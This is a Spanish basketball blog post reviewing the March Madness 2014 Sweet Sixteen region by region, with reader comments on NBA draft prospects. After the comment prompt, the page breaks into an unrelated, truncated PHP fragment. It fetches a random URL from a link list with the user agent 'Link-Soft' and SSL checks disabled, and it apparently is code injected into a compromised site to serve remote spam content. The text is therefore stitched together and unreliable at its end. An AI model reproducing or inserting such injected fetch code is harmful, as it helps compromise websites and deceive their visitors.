March Madness 2014: Sweet Sixteen

25 de March de 2014 por Ruxixon

Y como siempre tras el primer fin de semana, ya sabemos los 16 equipos que se jugaran el título nacional. No faltarán Florida, Arizona o Virginia, que han superado con solvencia sus enfrentamientos, pero Wichita State se ha quedado por el camino tras perder su primer y último partido de la temporada frente Kentucky en uno de los mejores encuentros universitarios de los últimos años. Dayton, Stanford y Tennessee son los sorprendentes invitados al segundo fin de semana de competición.

SOUTH REGION (by Txusma)

Como estaba previsto los Florida Gators (1) y los UCLA Bruins (4) se enfrentarán por un puesto en los Elite Eight. Los Gators no dejaron muy buenas sensaciones ante Albany en segunda ronda pero en la 3ª ante Pittsburg (9) recuperaron la energía y mostraron todo su potencial. Scottie Wilbekin (15.5p) dominó el partido a su antojo a ambos lados de la pistas y la defensa de los de Billy Donovan ahogó todo el juego ofensivo rival, incluido a Lamar Patterson que se quedó en 8 puntos. Por su parte, los Bruins llegan por primera vez a la 4ª ronda desde 2008, con las armas que pronosticábamos: mucho juego de equipo, muchas asistencias, y sobretodo, una gran capacidad para penalizar las pérdidas del equipo rival. Así ganó a Tulsa (13) en 2ª ronda y así lo hizo también a SF Austin (12), que vieron finiquitada así su racha de 29 victorias consecutivas. La habían mantenido en 2ª ronda a pesar de jugar contra VCU, a la que ganó en una prórroga que forzaron gracias a una jugada de 4 puntos a 3’5 segundos del final. Kyle Anderson (11.5p – 7r -5.5a – 2rb) y Jordan Adams (20p – 6.5r – 3.5a) ya esperan a Wilbekin en el que seguro será un partido apasionante.

En la otra parte del cuadro saltaron por los aires todos los pronósticos. Serán Dayton (11) y Stanford  (10) los que se disputen el convertirse en uno de los 8 mejores equipos del país tras imponerse a equipos teóricamente superiores en partidos resueltos con finales de infarto. Los Flyers ganaron a Ohio State (6) en 2ª ronda gracias a una bandeja de Vee Sanford a falta de 3 segundos que dejó en nada el enorme esfuerzo de Aaron Craft en los últimos minutos, y en 3ª ronda se cargaron a una Syracuse (3) que no fue capaz de meter ni un triple en todo el partido. Tyler Ennis (17.5p – 4.5a)  tuvo el tiro para ganar pero el balón no quiso entrar y los Orange, que no llegaban en su mejor forma, se fueron para casa antes de tiempo. Por su parte, los Cardinals de Stanford empezaron el partido de 2ª ronda con un 20-4 a su favor pero acabaron pidiendo la hora ante New Mexico (7). En cambio, en 3ª ronda se deshicieron en un buen partido de Kansas (2) en la que ha sido una de las grandes sorpresas del campeonato. Stanford ahogó a los Jayhawks y particularmente a Andrew Wiggins que puede haber dicho adiós a su periplo universitario con un horroroso partido (4 puntos con un 1 de 6 en TC y 4 pérdidas). Kansas  echó mucho de menos a Joel Embiid en la pintura. 

Otros destacados

  • Dwight Powell (Stanford), PF proyectado para 2ª ronda. 15 puntos y 7 rebotes ante Kansas a pesar de sufrir problemas de faltas.

MIDWEST REGION (by Ruxixon)

Ya no quedan imbatidos en la NCAA. Los Wildcats de Calipari, que han jugado su mejor partido de la temporada, han sido los culpables de que Wichita State (1) haya quedado apeado del torneo en su única derrota del año (78-76). Nos quedamos pues sin Cleanthony Early (27 ppg, 7 rpg) al que veremos seguramente por la NBA. Por Kentucky (8), Julius Randle es el único de ese “club de elegidos” del próximo draft que está respondiendo al nivel que se le supone, 19 puntos y 15 rebotes ante Kansas State (9), y rozando el triple doble ante Wichita, 13-10-6. Aaron Harrison cumple con el papel de perfecto escudero (18.5 ppg). El camino de Kentucky va creciendo en dificultad, y justo cuando parecen haber encontrado la forma de jugar en equipo se las verán con Louisville (4), en el que será un choque apasionante donde minimizar las pérdidas será una de las claves. Los Cardinals llegan sin mostrar su juego al 100%, aunque de momento no han estado muy exigidos. Para llegar hasta aquí apearon a Manhattan (13) y St.Louis (5) con el trio Harrell (11 p – 12 r de media) – Luke Hancock (18.5 ppg) – Russ Smith (14.5 ppg) como estiletes del equipo. El mejor Russ Smith tendrá que aparecer ante los gemelos Harrison y mucho ojo a ese duelo Randle – Harrell.

La cenicienta de la región es Tennessee (11). El ritmo del equipo lo lleva el escolta McRae (18.3 ppg) pero la verdadera fortaleza de los Volunteers procede de la pintura, donde cuentan con una pareja muy física que puede hacer daño a cualquiera, como pueden atestiguar los 3 rivales (Tennessee eliminó a Iowa en 1ª ronda) que han dejado por el camino. Maymon y sobre todo Jarnell Stokes (20.3 ppg – 15 rpg) se lo puede poner muy complicado a Michigan (2), que veía como su viaje al Elite 8 se allanaba con Duke (3) fuera del baile, en el que ha sido el upset del torneo a cargo de Mercer (14) –destacaremos que Jabari Parker hizo 14 p – 7 r con un 4 de 14 en el tiro-. No creo que estén tan contentos ahora viendo el momento de confianza de Tennessee, que les exigirán bastante más que Wofford (15) o Texas (7). Especial interés en el cara a cara entre Josh Richardson (19,3 ppg) y Nik Stauskas (16 ppg – 4.5 apg). El resto de integrantes del backcourt -Robinson III (14 p – 6 r)- deben respaldar a Nick y además ayudar a Jordan Morgan (12.5 p y 10 r de media) en la faceta reboteadora.

Otros destacados

  • Jahii Carson (Arizona State), PG proyectado como 2ª ronda del draft, 19 puntos y 9 asistencias.
  • TJ Warren (NC State), SF que ya se ha declarado elegible para el draft (en los mocks aparecen entre el 11 y el 20) con un promedio de 26.5 puntos por partido.

EAST REGION (by Ruxixon)

Virginia (1) se ha plantado en las semifinales regionales cumpliendo el abc de su baloncesto. Les costó arrancar ante Coastal Carolina (16), llegando a perder por 10 puntos en la primera parte, pero a partir de ese punto, su extraordinaria defensa, limitando a sus rivales a un pobre 40% en TC, y un ataque muy eficiente (más del 50% de acierto) han supuesto su tarjeta de visita para plantarse en el Sweet Sixteen. No obstante, se hace difícil señalar a un jugador en un bloque tan compacto. Podríamos elegir a su teórica estrella Joe Harris (13.5 ppg) o Anthony Gill, que está promediando un 15 p – 6.5 r saliendo desde el banquillo. Ahora llega el turno de batirse en duelo con Michigan State (4) que no es que fueran muy sobrados en su partido de la ronda anterior ante Harvard (12), insinuándose el upset en la segunda mitad, aunque finalmente los Spartans consiguieron el triunfo gracias al acierto desde la línea de personal. A nivel individual Adrian Payne ha protagonizado ante Delaware (13) la que es la mejor actuación del torneo hasta ahora, con 41 puntos y 8 rebotes, mientras que Dawson aportó 26 puntos y 9 rebotes ante Harvard. Gary Harris (14 ppg) mantiene una línea constante sin grandes picos pero tampoco protagonizando grandes campanazos. Appling sigue sin encontrar su juego, eso sí. Si Virginia quiere pasar de ronda tendrá que llevar el encuentro al ritmo que a ellos les interesa, es decir un juego muy lento, que minimice el impacto de Payne y Dawson, sobre los cuales deberán aplicarse en defensa.

Sobre el papel el Virginia – Michigan State tiene todas las papeletas para resultar un tanto complicado de digerir para el aficionado, así que la NCAA ha colocado el Iowa State – Connecticut dos horas antes para hacernos más llevadero el día. Cualquier partido donde esté Iowa State (3) es sinónimo de alta anotación y éste no parece que vaya a escapar de la norma. Y eso que, lamentablemente, no podrán contar con uno de sus mejores jugadores, el sophomore George Niang, que antes de despedirse del torneo con una fractura en su pie aún le dio tiempo para poner un 24 p – 6 r en su estadística. Su ausencia debe ser tapada por Melvin Ejim (18 p – 6 r) y un DeAndre Kane on fire (19.5 p – 8.5 r – 6 a) principalmente. En los Huskies el hombre de moda es Shabazz Napier (24.5 p – 6.5 r – 4.5 a) y no son pocos los que están encargando las palomitas para disfrutar de su duelo con Kane. Connecticut (7) se planta aquí tras ganar a St Josephs (10) y Villanova (2), que ve como es el único de los 4 seeds de la región que se queda fuera de las semifinales regionales. Uno de las claves para ellos será limitar el gran abanico de opciones que Iowa St tiene para abordar la canasta y aprovechar esas opciones que dejan para anotar debido a su déficit defensivo. Hay que comentar que antes de empezar Connecticut tiene la ventaja de jugar en “casa”, pues el partido se disputará en el Madison Square Garden (están a menos de 3 horas en coche en comparación con los 1600 kms que tendrán que recorrer los fans de los Cyclones).

Otros destacados

  • El dúo de North Carolina, Marcus Paige 19 ppg y James McAdoo con 15 p – 8.5 r.
  • Kilpatrick (Cincinnati) con 19 puntos que fueron inútiles ante Harvard.

WEST REGION (by Txusma)

En la West Region prácticamente no ha habido sorpresas. A Arizona (1) le costó 5 minutos entrar el torneo. Empezaron perdiendo 7-0 pero Aaron Gordon y sus compañeros rápidamente pusieron las cosas en su sitio y acabaron doblegando a Weber State con facilidad pero sin alardes. En 3ª ronda, en cambio, destrozaron a Gonzaga con una gran defensa y velocidad y mostraron su candidatura al título nacional. Aaron Gordon (17p – 7r – 4.5a – 2.5t – 2rb, 71% TC) ha mostrado un gran nivel en estos 2 primeros partidos. De todas maneras, si los Wildcats quieren el título antes deberán superar a San Diego State (4) que le vio las orejas al lobo cuando necesitó de una prórroga para eliminar a New Mexico St. (13) en 2ª ronda. Después en 3ª no tuvieron problemas para deshacerse de North Dakota St (12) que había eliminado por sorpresa  a Oklahoma (6) en su primer partido. Xavier Themes (27.5p – 5a) será el hombre a seguir de los Aztecs en el enfrentamiento del Sweet Sixteen.

Baylor (6) es el invitado sorpresa de esta ronda pero llega después de barrer a Creighton (3) por 30 puntos de diferencia. Doug McDermott se estrelló ante la atlética defensa de los Bears y solo fue capaz de anotar 15 puntos, cuando en 2ª ronda había ganado prácticamente él solo a LA Lafayette (14) con 3o puntos y 12 rebotes. Sin embargo, ante Wisconsin (2) no podrán centrarse en un solo hombre. Si en su primer partido fue Traevor Jackson con 18 puntos su mejor anotador, en el segundo lo fue Frank Kaminsky con 19 pero es que hasta 5 hombres han anotado más de 10 puntos de media en estos 2 partidos. El primero fue un paseo en el que ganaron de 40 puntos a la débil American University (15) pero en el 2º tuvieron que sudar para remontar los 12 puntos de ventaja que tenían los Oregon Ducks (7) al descanso. Conocidos por su defensa, los Badgers tiraron de juego ofensivo para sacar adelante el partido. Todo un aviso para navegantes. Los Wildcats seguro que habrán tomado buena nota.

Otros destacados

  • Nick Johnson (Arizona), SG proyectado al final de la 1ª ronda, principios de la 2ª. 17.5 puntos de media. Ante Gonzaga consiguió 17 puntos, 5 rebotes, 5 asistencias, 3 robos y 4 tapones.
  • Cory Jefferson (Baylor), PF proyectado para la 2ª ronda. 15 puntos de media.
Comenta

4 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    La verdad es que el partido que hizo Wiggins ante Stanford me deja un poco “meh”,se movía por la pista como esquivando coger responsabilidades y solamente actuaba como el jugador que se le supone cuando se veía con capacidad para meter toda la potencia de su cuerpo,que ahí es donde es diferencial,por ejemplo cargando el rebote o en penetraciones,aunque también aquí arriesgaba en exceso.Va a dar el salto,está claro,pero me crea dudas que después de sus exhibiciones de final de temporada haya mostrado esta versión.

    Sobre Jabari no ha rechazado su rol y ha sido más bien víctima de la incapacidad de Coach K en el partido ante Mercer,aunque viene derivado por ese quinteto,sin un jugador realmente que se pueda considerar interior.El año que viene lo solucionan con el recruit de Okafor y seguramente veamos a Duke en la parte final del torneo,aunque Parker emigre a la NBA.

      Citar

  2. Viva_Dirk dice:
    #2

    Comento ‘en clave de draft’. Hay 2 jugadores que salen ahora mismo muy reforzados: Julius Randle y Aaron Gordon. Randle ha estado feroz en todos los partidos, con una energía tremenda y mostrando un gran afán por ganar antes que por lucir en lo personal, y aún así ha lucido bastante; veo casi imposible que suba del pick 4 pero si sigue jugando así podría pasar. Aaron Gordon me ha sorprendido muchísimo, se parece poco al jugador que vi en algunos partidos en diciembre y enero, mucho mas sereno y jugando sencillo; está verde y si da el salto las pasará canutas bastantes partidos, pero perfectamente puede ser pick 6-8.

    Un poco mas abajo también salen muy bien parados Kyle Anderson, Montrezl Harrell, Andreian Payne, Gary Harris y Elfrid Payton, aunque este último ya eliminado. Sólo Harris puede optar a top10 con un buen final de torneo, el resto pueden escalar posiciones y ser apuestas importantes de equipos medios.

    Fracasos gordos de Parker y los de Syracuse, algo menos de Wiggins que hizo un buen partido pero aun así decepcionante. Smart estuvo desatado para bien y para mal, de los exteriores parece el mas preparado para dar su nivel real lo antes posible. McDermott hizo lo suyo pero sigue generando dudas, las dudas inversas que Cauley-Stein, el cual es realmente el primer jugador que veo comparable con Ben Wallace.

      Citar

  3. Ruxixon dice:
    #3

    McDermott en un equipo como Pistons,contando con que estos pudieran traspasar a Monroe,jugando con Josh Smith de 4 y Drummond de 5,y con un jugador como KCP en el puesto de escolta orientado a la faceta defensiva,me parece un jugador cojonudo.De todas formas no es un jugador que encaje fácil y como dice Viva,se verá en el draft.

      Citar

  4. Txusma dice:
    #4

    Es que McDermott ha de defender menos que Kyle Korver, por ejemplo? Y ahí tenemos al alero de los Hawks…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>